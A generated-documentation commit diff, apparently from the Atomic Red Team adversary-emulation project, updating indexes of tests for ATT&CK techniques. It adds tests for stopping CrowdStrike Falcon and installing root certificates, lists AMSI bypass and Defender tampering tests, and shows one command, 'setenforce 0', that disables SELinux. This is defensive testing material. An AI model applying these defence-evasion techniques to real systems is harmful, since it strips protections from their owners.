Generate docs from job=validate_atomics_generate_docs branch=master

2020-05-06 16:23:43 +00:00
parent 7d63609ea3
commit da779f042d
26 changed files with 970 additions and 228 deletions
@@ -1 +1 @@
-{"version":"2.2","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1002","score":100,"enabled":true},{"techniqueID":"T1005","score":100,"enabled":true},{"techniqueID":"T1009","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1022","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1045","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1063","score":100,"enabled":true},{"techniqueID":"T1064","score":100,"enabled":true},{"techniqueID":"T1065","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1081","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1089","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1099","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1107","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1139","score":100,"enabled":true},{"techniqueID":"T1141","score":100,"enabled":true},{"techniqueID":"T1142","score":100,"enabled":true},{"techniqueID":"T1144","score":100,"enabled":true},{"techniqueID":"T1145","score":100,"enabled":true},{"techniqueID":"T1146","score":100,"enabled":true},{"techniqueID":"T1147","score":100,"enabled":true},{"techniqueID":"T1148","score":100,"enabled":true},{"techniqueID":"T1150","score":100,"enabled":true},{"techniqueID":"T1151","score":100,"enabled":true},{"techniqueID":"T1152","score":100,"enabled":true},{"techniqueID":"T1153","score":100,"enabled":true},{"techniqueID":"T1154","score":100,"enabled":true},{"techniqueID":"T1155","score":100,"enabled":true},{"techniqueID":"T1156","score":100,"enabled":true},{"techniqueID":"T1158","score":100,"enabled":true},{"techniqueID":"T1159","score":100,"enabled":true},{"techniqueID":"T1160","score":100,"enabled":true},{"techniqueID":"T1163","score":100,"enabled":true},{"techniqueID":"T1164","score":100,"enabled":true},{"techniqueID":"T1165","score":100,"enabled":true},{"techniqueID":"T1166","score":100,"enabled":true},{"techniqueID":"T1168","score":100,"enabled":true},{"techniqueID":"T1169","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1206","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1519","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true}]}
+{"version":"2.2","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1002","score":100,"enabled":true},{"techniqueID":"T1005","score":100,"enabled":true},{"techniqueID":"T1009","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1022","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1045","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1063","score":100,"enabled":true},{"techniqueID":"T1064","score":100,"enabled":true},{"techniqueID":"T1065","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1081","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1089","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1099","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1107","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1130","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1139","score":100,"enabled":true},{"techniqueID":"T1141","score":100,"enabled":true},{"techniqueID":"T1142","score":100,"enabled":true},{"techniqueID":"T1144","score":100,"enabled":true},{"techniqueID":"T1145","score":100,"enabled":true},{"techniqueID":"T1146","score":100,"enabled":true},{"techniqueID":"T1147","score":100,"enabled":true},{"techniqueID":"T1148","score":100,"enabled":true},{"techniqueID":"T1150","score":100,"enabled":true},{"techniqueID":"T1151","score":100,"enabled":true},{"techniqueID":"T1152","score":100,"enabled":true},{"techniqueID":"T1153","score":100,"enabled":true},{"techniqueID":"T1154","score":100,"enabled":true},{"techniqueID":"T1155","score":100,"enabled":true},{"techniqueID":"T1156","score":100,"enabled":true},{"techniqueID":"T1158","score":100,"enabled":true},{"techniqueID":"T1159","score":100,"enabled":true},{"techniqueID":"T1160","score":100,"enabled":true},{"techniqueID":"T1163","score":100,"enabled":true},{"techniqueID":"T1164","score":100,"enabled":true},{"techniqueID":"T1165","score":100,"enabled":true},{"techniqueID":"T1166","score":100,"enabled":true},{"techniqueID":"T1168","score":100,"enabled":true},{"techniqueID":"T1169","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1206","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1519","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true}]}
@@ -121,21 +121,24 @@ defense-evasion,T1089,Disabling Security Tools,1,Disable iptables firewall
 defense-evasion,T1089,Disabling Security Tools,2,Disable syslog
 defense-evasion,T1089,Disabling Security Tools,3,Disable Cb Response
 defense-evasion,T1089,Disabling Security Tools,4,Disable SELinux
-defense-evasion,T1089,Disabling Security Tools,5,Disable Carbon Black Response
-defense-evasion,T1089,Disabling Security Tools,6,Disable LittleSnitch
-defense-evasion,T1089,Disabling Security Tools,7,Disable OpenDNS Umbrella
-defense-evasion,T1089,Disabling Security Tools,8,Unload Sysmon Filter Driver
-defense-evasion,T1089,Disabling Security Tools,9,Disable Windows IIS HTTP Logging
-defense-evasion,T1089,Disabling Security Tools,10,Uninstall Sysmon
-defense-evasion,T1089,Disabling Security Tools,11,AMSI Bypass - AMSI InitFailed
-defense-evasion,T1089,Disabling Security Tools,12,AMSI Bypass - Remove AMSI Provider Reg Key
-defense-evasion,T1089,Disabling Security Tools,13,Disable Arbitrary Security Windows Service
-defense-evasion,T1089,Disabling Security Tools,14,Tamper with Windows Defender ATP PowerShell
-defense-evasion,T1089,Disabling Security Tools,15,Tamper with Windows Defender Command Prompt
-defense-evasion,T1089,Disabling Security Tools,16,Tamper with Windows Defender Registry
-defense-evasion,T1089,Disabling Security Tools,17,Disable Microft Office Security Features
-defense-evasion,T1089,Disabling Security Tools,18,Remove Windows Defender Definition Files
-defense-evasion,T1089,Disabling Security Tools,19,Stop and Remove Arbitrary Security Windows Service
+defense-evasion,T1089,Disabling Security Tools,5,Stop Crowdstrike Falcon on Linux
+defense-evasion,T1089,Disabling Security Tools,6,Disable Carbon Black Response
+defense-evasion,T1089,Disabling Security Tools,7,Disable LittleSnitch
+defense-evasion,T1089,Disabling Security Tools,8,Disable OpenDNS Umbrella
+defense-evasion,T1089,Disabling Security Tools,9,Stop and unload Crowdstrike Falcon on macOS
+defense-evasion,T1089,Disabling Security Tools,10,Unload Sysmon Filter Driver
+defense-evasion,T1089,Disabling Security Tools,11,Disable Windows IIS HTTP Logging
+defense-evasion,T1089,Disabling Security Tools,12,Uninstall Sysmon
+defense-evasion,T1089,Disabling Security Tools,13,AMSI Bypass - AMSI InitFailed
+defense-evasion,T1089,Disabling Security Tools,14,AMSI Bypass - Remove AMSI Provider Reg Key
+defense-evasion,T1089,Disabling Security Tools,15,Disable Arbitrary Security Windows Service
+defense-evasion,T1089,Disabling Security Tools,16,Tamper with Windows Defender ATP PowerShell
+defense-evasion,T1089,Disabling Security Tools,17,Tamper with Windows Defender Command Prompt
+defense-evasion,T1089,Disabling Security Tools,18,Tamper with Windows Defender Registry
+defense-evasion,T1089,Disabling Security Tools,19,Disable Microft Office Security Features
+defense-evasion,T1089,Disabling Security Tools,20,Remove Windows Defender Definition Files
+defense-evasion,T1089,Disabling Security Tools,21,Stop and Remove Arbitrary Security Windows Service
+defense-evasion,T1089,Disabling Security Tools,22,Uninstall Crowdstrike Falcon on Windows
 defense-evasion,T1107,File Deletion,1,Delete a single file - Linux/macOS
 defense-evasion,T1107,File Deletion,2,Delete an entire folder - Linux/macOS
 defense-evasion,T1107,File Deletion,3,Overwrite and delete a file with shred
@@ -184,6 +187,9 @@ defense-evasion,T1070,Indicator Removal on Host,7,Delete System Logs Using Clear
 defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe
 defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution - forfiles.exe
 defense-evasion,T1130,Install Root Certificate,1,Install root CA on CentOS/RHEL
+defense-evasion,T1130,Install Root Certificate,2,Install root CA on Debian/Ubuntu
+defense-evasion,T1130,Install Root Certificate,3,Install root CA on macOS
+defense-evasion,T1130,Install Root Certificate,4,Install root CA on Windows
 defense-evasion,T1118,InstallUtil,1,CheckIfInstallable method call
 defense-evasion,T1118,InstallUtil,2,InstallHelper method call
 defense-evasion,T1118,InstallUtil,3,InstallUtil class constructor method call
@@ -407,7 +413,7 @@ discovery,T1082,System Information Discovery,5,Linux VM Check via Kernel Modules
 discovery,T1082,System Information Discovery,6,Hostname Discovery (Windows)
 discovery,T1082,System Information Discovery,7,Hostname Discovery
 discovery,T1082,System Information Discovery,8,Windows MachineGUID Discovery
-discovery,T1016,System Network Configuration Discovery,1,System Network Configuration Discovery
+discovery,T1016,System Network Configuration Discovery,1,System Network Configuration Discovery on Windows
 discovery,T1016,System Network Configuration Discovery,2,List Windows Firewall Rules
 discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery
 discovery,T1016,System Network Configuration Discovery,4,System Network Configuration Discovery (TrickBot Style)
@@ -46,7 +46,6 @@ discovery,T1069,Permission Groups Discovery,1,Permission Groups Discovery
 discovery,T1057,Process Discovery,1,Process Discovery - ps
 discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix
 discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep
-discovery,T1082,System Information Discovery,2,System Information Discovery
 discovery,T1082,System Information Discovery,3,List OS Information
 discovery,T1082,System Information Discovery,4,Linux VM Check via Hardware
 discovery,T1082,System Information Discovery,5,Linux VM Check via Kernel Modules
@@ -72,6 +71,7 @@ defense-evasion,T1089,Disabling Security Tools,1,Disable iptables firewall
 defense-evasion,T1089,Disabling Security Tools,2,Disable syslog
 defense-evasion,T1089,Disabling Security Tools,3,Disable Cb Response
 defense-evasion,T1089,Disabling Security Tools,4,Disable SELinux
+defense-evasion,T1089,Disabling Security Tools,5,Stop Crowdstrike Falcon on Linux
 defense-evasion,T1107,File Deletion,1,Delete a single file - Linux/macOS
 defense-evasion,T1107,File Deletion,2,Delete an entire folder - Linux/macOS
 defense-evasion,T1107,File Deletion,3,Overwrite and delete a file with shred
@@ -92,6 +92,7 @@ defense-evasion,T1070,Indicator Removal on Host,3,rm -rf
 defense-evasion,T1070,Indicator Removal on Host,4,Overwrite Linux Mail Spool
 defense-evasion,T1070,Indicator Removal on Host,5,Overwrite Linux Log
 defense-evasion,T1130,Install Root Certificate,1,Install root CA on CentOS/RHEL
+defense-evasion,T1130,Install Root Certificate,2,Install root CA on Debian/Ubuntu
 defense-evasion,T1036,Masquerading,2,Masquerading as Linux crond process.
 defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script
 defense-evasion,T1055,Process Injection,2,Shared Library Injection via /etc/ld.so.preload
@@ -104,9 +104,10 @@ defense-evasion,T1146,Clear Command History,3,Clear Bash history (cat dev/null)
 defense-evasion,T1146,Clear Command History,4,Clear Bash history (ln dev/null)
 defense-evasion,T1146,Clear Command History,6,Clear history of a bunch of shells
 defense-evasion,T1090,Connection Proxy,1,Connection Proxy
-defense-evasion,T1089,Disabling Security Tools,5,Disable Carbon Black Response
-defense-evasion,T1089,Disabling Security Tools,6,Disable LittleSnitch
-defense-evasion,T1089,Disabling Security Tools,7,Disable OpenDNS Umbrella
+defense-evasion,T1089,Disabling Security Tools,6,Disable Carbon Black Response
+defense-evasion,T1089,Disabling Security Tools,7,Disable LittleSnitch
+defense-evasion,T1089,Disabling Security Tools,8,Disable OpenDNS Umbrella
+defense-evasion,T1089,Disabling Security Tools,9,Stop and unload Crowdstrike Falcon on macOS
 defense-evasion,T1107,File Deletion,1,Delete a single file - Linux/macOS
 defense-evasion,T1107,File Deletion,2,Delete an entire folder - Linux/macOS
 defense-evasion,T1222,File and Directory Permissions Modification,4,chmod - Change file or folder mode (numeric mode)
@@ -128,6 +129,7 @@ defense-evasion,T1158,Hidden Files and Directories,6,Hide a Directory
 defense-evasion,T1158,Hidden Files and Directories,7,Show all hidden files
 defense-evasion,T1147,Hidden Users,1,Hidden Users
 defense-evasion,T1070,Indicator Removal on Host,3,rm -rf
+defense-evasion,T1130,Install Root Certificate,3,Install root CA on macOS
 defense-evasion,T1152,Launchctl,1,Launchctl
 defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script
 defense-evasion,T1150,Plist Modification,1,Plist Modification
@@ -23,18 +23,19 @@ defense-evasion,T1038,DLL Search Order Hijacking,1,DLL Search Order Hijacking -
 defense-evasion,T1073,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,1,Deobfuscate/Decode Files Or Information
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,2,Certutil Rename and Decode
-defense-evasion,T1089,Disabling Security Tools,8,Unload Sysmon Filter Driver
-defense-evasion,T1089,Disabling Security Tools,9,Disable Windows IIS HTTP Logging
-defense-evasion,T1089,Disabling Security Tools,10,Uninstall Sysmon
-defense-evasion,T1089,Disabling Security Tools,11,AMSI Bypass - AMSI InitFailed
-defense-evasion,T1089,Disabling Security Tools,12,AMSI Bypass - Remove AMSI Provider Reg Key
-defense-evasion,T1089,Disabling Security Tools,13,Disable Arbitrary Security Windows Service
-defense-evasion,T1089,Disabling Security Tools,14,Tamper with Windows Defender ATP PowerShell
-defense-evasion,T1089,Disabling Security Tools,15,Tamper with Windows Defender Command Prompt
-defense-evasion,T1089,Disabling Security Tools,16,Tamper with Windows Defender Registry
-defense-evasion,T1089,Disabling Security Tools,17,Disable Microft Office Security Features
-defense-evasion,T1089,Disabling Security Tools,18,Remove Windows Defender Definition Files
-defense-evasion,T1089,Disabling Security Tools,19,Stop and Remove Arbitrary Security Windows Service
+defense-evasion,T1089,Disabling Security Tools,10,Unload Sysmon Filter Driver
+defense-evasion,T1089,Disabling Security Tools,11,Disable Windows IIS HTTP Logging
+defense-evasion,T1089,Disabling Security Tools,12,Uninstall Sysmon
+defense-evasion,T1089,Disabling Security Tools,13,AMSI Bypass - AMSI InitFailed
+defense-evasion,T1089,Disabling Security Tools,14,AMSI Bypass - Remove AMSI Provider Reg Key
+defense-evasion,T1089,Disabling Security Tools,15,Disable Arbitrary Security Windows Service
+defense-evasion,T1089,Disabling Security Tools,16,Tamper with Windows Defender ATP PowerShell
+defense-evasion,T1089,Disabling Security Tools,17,Tamper with Windows Defender Command Prompt
+defense-evasion,T1089,Disabling Security Tools,18,Tamper with Windows Defender Registry
+defense-evasion,T1089,Disabling Security Tools,19,Disable Microft Office Security Features
+defense-evasion,T1089,Disabling Security Tools,20,Remove Windows Defender Definition Files
+defense-evasion,T1089,Disabling Security Tools,21,Stop and Remove Arbitrary Security Windows Service
+defense-evasion,T1089,Disabling Security Tools,22,Uninstall Crowdstrike Falcon on Windows
 defense-evasion,T1107,File Deletion,4,Delete a single file - Windows cmd
 defense-evasion,T1107,File Deletion,5,Delete an entire folder - Windows cmd
 defense-evasion,T1107,File Deletion,6,Delete a single file - Windows PowerShell
@@ -57,6 +58,7 @@ defense-evasion,T1070,Indicator Removal on Host,6,Delete System Logs Using Power
 defense-evasion,T1070,Indicator Removal on Host,7,Delete System Logs Using Clear-EventLogId
 defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe
 defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution - forfiles.exe
+defense-evasion,T1130,Install Root Certificate,4,Install root CA on Windows
 defense-evasion,T1118,InstallUtil,1,CheckIfInstallable method call
 defense-evasion,T1118,InstallUtil,2,InstallHelper method call
 defense-evasion,T1118,InstallUtil,3,InstallUtil class constructor method call
@@ -266,7 +268,7 @@ discovery,T1518,Software Discovery,2,Applications Installed
 discovery,T1082,System Information Discovery,1,System Information Discovery
 discovery,T1082,System Information Discovery,6,Hostname Discovery (Windows)
 discovery,T1082,System Information Discovery,8,Windows MachineGUID Discovery
-discovery,T1016,System Network Configuration Discovery,1,System Network Configuration Discovery
+discovery,T1016,System Network Configuration Discovery,1,System Network Configuration Discovery on Windows
 discovery,T1016,System Network Configuration Discovery,2,List Windows Firewall Rules
 discovery,T1016,System Network Configuration Discovery,4,System Network Configuration Discovery (TrickBot Style)
 discovery,T1016,System Network Configuration Discovery,5,List Open Egress Ports
@@ -206,21 +206,24 @@
  - Atomic Test #2: Disable syslog [linux]
  - Atomic Test #3: Disable Cb Response [linux]
  - Atomic Test #4: Disable SELinux [linux]
-  - Atomic Test #5: Disable Carbon Black Response [macos]
-  - Atomic Test #6: Disable LittleSnitch [macos]
-  - Atomic Test #7: Disable OpenDNS Umbrella [macos]
-  - Atomic Test #8: Unload Sysmon Filter Driver [windows]
-  - Atomic Test #9: Disable Windows IIS HTTP Logging [windows]
-  - Atomic Test #10: Uninstall Sysmon [windows]
-  - Atomic Test #11: AMSI Bypass - AMSI InitFailed [windows]
-  - Atomic Test #12: AMSI Bypass - Remove AMSI Provider Reg Key [windows]
-  - Atomic Test #13: Disable Arbitrary Security Windows Service [windows]
-  - Atomic Test #14: Tamper with Windows Defender ATP PowerShell [windows]
-  - Atomic Test #15: Tamper with Windows Defender Command Prompt [windows]
-  - Atomic Test #16: Tamper with Windows Defender Registry [windows]
-  - Atomic Test #17: Disable Microft Office Security Features [windows]
-  - Atomic Test #18: Remove Windows Defender Definition Files [windows]
-  - Atomic Test #19: Stop and Remove Arbitrary Security Windows Service [windows]
+  - Atomic Test #5: Stop Crowdstrike Falcon on Linux [linux]
+  - Atomic Test #6: Disable Carbon Black Response [macos]
+  - Atomic Test #7: Disable LittleSnitch [macos]
+  - Atomic Test #8: Disable OpenDNS Umbrella [macos]
+  - Atomic Test #9: Stop and unload Crowdstrike Falcon on macOS [macos]
+  - Atomic Test #10: Unload Sysmon Filter Driver [windows]
+  - Atomic Test #11: Disable Windows IIS HTTP Logging [windows]
+  - Atomic Test #12: Uninstall Sysmon [windows]
+  - Atomic Test #13: AMSI Bypass - AMSI InitFailed [windows]
+  - Atomic Test #14: AMSI Bypass - Remove AMSI Provider Reg Key [windows]
+  - Atomic Test #15: Disable Arbitrary Security Windows Service [windows]
+  - Atomic Test #16: Tamper with Windows Defender ATP PowerShell [windows]
+  - Atomic Test #17: Tamper with Windows Defender Command Prompt [windows]
+  - Atomic Test #18: Tamper with Windows Defender Registry [windows]
+  - Atomic Test #19: Disable Microft Office Security Features [windows]
+  - Atomic Test #20: Remove Windows Defender Definition Files [windows]
+  - Atomic Test #21: Stop and Remove Arbitrary Security Windows Service [windows]
+  - Atomic Test #22: Uninstall Crowdstrike Falcon on Windows [windows]
 - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -287,6 +290,9 @@
  - Atomic Test #2: Indirect Command Execution - forfiles.exe [windows]
 - [T1130 Install Root Certificate](../../T1130/T1130.md)
  - Atomic Test #1: Install root CA on CentOS/RHEL [linux]
+  - Atomic Test #2: Install root CA on Debian/Ubuntu [linux]
+  - Atomic Test #3: Install root CA on macOS [macos]
+  - Atomic Test #4: Install root CA on Windows [windows]
 - [T1118 InstallUtil](../../T1118/T1118.md)
  - Atomic Test #1: CheckIfInstallable method call [windows]
  - Atomic Test #2: InstallHelper method call [windows]
@@ -612,7 +618,7 @@
  - Atomic Test #2: Applications Installed [windows]
 - [T1082 System Information Discovery](../../T1082/T1082.md)
  - Atomic Test #1: System Information Discovery [windows]
-  - Atomic Test #2: System Information Discovery [linux, macos]
+  - Atomic Test #2: System Information Discovery [macos]
  - Atomic Test #3: List OS Information [linux, macos]
  - Atomic Test #4: Linux VM Check via Hardware [linux]
  - Atomic Test #5: Linux VM Check via Kernel Modules [linux]
@@ -620,7 +626,7 @@
  - Atomic Test #7: Hostname Discovery [linux, macos]
  - Atomic Test #8: Windows MachineGUID Discovery [windows]
 - [T1016 System Network Configuration Discovery](../../T1016/T1016.md)
-  - Atomic Test #1: System Network Configuration Discovery [windows]
+  - Atomic Test #1: System Network Configuration Discovery on Windows [windows]
  - Atomic Test #2: List Windows Firewall Rules [windows]
  - Atomic Test #3: System Network Configuration Discovery [macos, linux]
  - Atomic Test #4: System Network Configuration Discovery (TrickBot Style) [windows]
@@ -98,7 +98,6 @@
  - Atomic Test #7: Remote System Discovery - sweep [linux, macos]
 - [T1518 Software Discovery](../../T1518/T1518.md)
 - [T1082 System Information Discovery](../../T1082/T1082.md)
-  - Atomic Test #2: System Information Discovery [linux, macos]
  - Atomic Test #3: List OS Information [linux, macos]
  - Atomic Test #4: Linux VM Check via Hardware [linux]
  - Atomic Test #5: Linux VM Check via Kernel Modules [linux]
@@ -151,6 +150,7 @@
  - Atomic Test #2: Disable syslog [linux]
  - Atomic Test #3: Disable Cb Response [linux]
  - Atomic Test #4: Disable SELinux [linux]
+  - Atomic Test #5: Stop Crowdstrike Falcon on Linux [linux]
 - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1107 File Deletion](../../T1107/T1107.md)
@@ -180,6 +180,7 @@
  - Atomic Test #5: Overwrite Linux Log [linux]
 - [T1130 Install Root Certificate](../../T1130/T1130.md)
  - Atomic Test #1: Install root CA on CentOS/RHEL [linux]
+  - Atomic Test #2: Install root CA on Debian/Ubuntu [linux]
 - [T1036 Masquerading](../../T1036/T1036.md)
  - Atomic Test #2: Masquerading as Linux crond process. [linux]
 - [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
@@ -111,7 +111,7 @@
  - Atomic Test #3: Security Software Discovery - ps [linux, macos]
 - [T1518 Software Discovery](../../T1518/T1518.md)
 - [T1082 System Information Discovery](../../T1082/T1082.md)
-  - Atomic Test #2: System Information Discovery [linux, macos]
+  - Atomic Test #2: System Information Discovery [macos]
  - Atomic Test #3: List OS Information [linux, macos]
  - Atomic Test #7: Hostname Discovery [linux, macos]
 - [T1016 System Network Configuration Discovery](../../T1016/T1016.md)
@@ -240,9 +240,10 @@
 - [T1090 Connection Proxy](../../T1090/T1090.md)
  - Atomic Test #1: Connection Proxy [macos, linux]
 - [T1089 Disabling Security Tools](../../T1089/T1089.md)
-  - Atomic Test #5: Disable Carbon Black Response [macos]
-  - Atomic Test #6: Disable LittleSnitch [macos]
-  - Atomic Test #7: Disable OpenDNS Umbrella [macos]
+  - Atomic Test #6: Disable Carbon Black Response [macos]
+  - Atomic Test #7: Disable LittleSnitch [macos]
+  - Atomic Test #8: Disable OpenDNS Umbrella [macos]
+  - Atomic Test #9: Stop and unload Crowdstrike Falcon on macOS [macos]
 - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1107 File Deletion](../../T1107/T1107.md)
@@ -276,6 +277,7 @@
 - [T1070 Indicator Removal on Host](../../T1070/T1070.md)
  - Atomic Test #3: rm -rf [macos, linux]
 - [T1130 Install Root Certificate](../../T1130/T1130.md)
+  - Atomic Test #3: Install root CA on macOS [macos]
 - T1149 LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1152 Launchctl](../../T1152/T1152.md)
  - Atomic Test #1: Launchctl [macos]
@@ -41,18 +41,19 @@
  - Atomic Test #1: Deobfuscate/Decode Files Or Information [windows]
  - Atomic Test #2: Certutil Rename and Decode [windows]
 - [T1089 Disabling Security Tools](../../T1089/T1089.md)
-  - Atomic Test #8: Unload Sysmon Filter Driver [windows]
-  - Atomic Test #9: Disable Windows IIS HTTP Logging [windows]
-  - Atomic Test #10: Uninstall Sysmon [windows]
-  - Atomic Test #11: AMSI Bypass - AMSI InitFailed [windows]
-  - Atomic Test #12: AMSI Bypass - Remove AMSI Provider Reg Key [windows]
-  - Atomic Test #13: Disable Arbitrary Security Windows Service [windows]
-  - Atomic Test #14: Tamper with Windows Defender ATP PowerShell [windows]
-  - Atomic Test #15: Tamper with Windows Defender Command Prompt [windows]
-  - Atomic Test #16: Tamper with Windows Defender Registry [windows]
-  - Atomic Test #17: Disable Microft Office Security Features [windows]
-  - Atomic Test #18: Remove Windows Defender Definition Files [windows]
-  - Atomic Test #19: Stop and Remove Arbitrary Security Windows Service [windows]
+  - Atomic Test #10: Unload Sysmon Filter Driver [windows]
+  - Atomic Test #11: Disable Windows IIS HTTP Logging [windows]
+  - Atomic Test #12: Uninstall Sysmon [windows]
+  - Atomic Test #13: AMSI Bypass - AMSI InitFailed [windows]
+  - Atomic Test #14: AMSI Bypass - Remove AMSI Provider Reg Key [windows]
+  - Atomic Test #15: Disable Arbitrary Security Windows Service [windows]
+  - Atomic Test #16: Tamper with Windows Defender ATP PowerShell [windows]
+  - Atomic Test #17: Tamper with Windows Defender Command Prompt [windows]
+  - Atomic Test #18: Tamper with Windows Defender Registry [windows]
+  - Atomic Test #19: Disable Microft Office Security Features [windows]
+  - Atomic Test #20: Remove Windows Defender Definition Files [windows]
+  - Atomic Test #21: Stop and Remove Arbitrary Security Windows Service [windows]
+  - Atomic Test #22: Uninstall Crowdstrike Falcon on Windows [windows]
 - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -90,6 +91,7 @@
  - Atomic Test #1: Indirect Command Execution - pcalua.exe [windows]
  - Atomic Test #2: Indirect Command Execution - forfiles.exe [windows]
 - [T1130 Install Root Certificate](../../T1130/T1130.md)
+  - Atomic Test #4: Install root CA on Windows [windows]
 - [T1118 InstallUtil](../../T1118/T1118.md)
  - Atomic Test #1: CheckIfInstallable method call [windows]
  - Atomic Test #2: InstallHelper method call [windows]
@@ -436,7 +438,7 @@
  - Atomic Test #6: Hostname Discovery (Windows) [windows]
  - Atomic Test #8: Windows MachineGUID Discovery [windows]
 - [T1016 System Network Configuration Discovery](../../T1016/T1016.md)
-  - Atomic Test #1: System Network Configuration Discovery [windows]
+  - Atomic Test #1: System Network Configuration Discovery on Windows [windows]
  - Atomic Test #2: List Windows Firewall Rules [windows]
  - Atomic Test #4: System Network Configuration Discovery (TrickBot Style) [windows]
  - Atomic Test #5: List Open Egress Ports [windows]
@@ -7399,6 +7399,21 @@ defense-evasion:
        command: 'setenforce 0

 '
+    - name: Stop Crowdstrike Falcon on Linux
+      description: 'Stop and disable Crowdstrike Falcon on Linux
+
+'
+      supported_platforms:
+      - linux
+      executor:
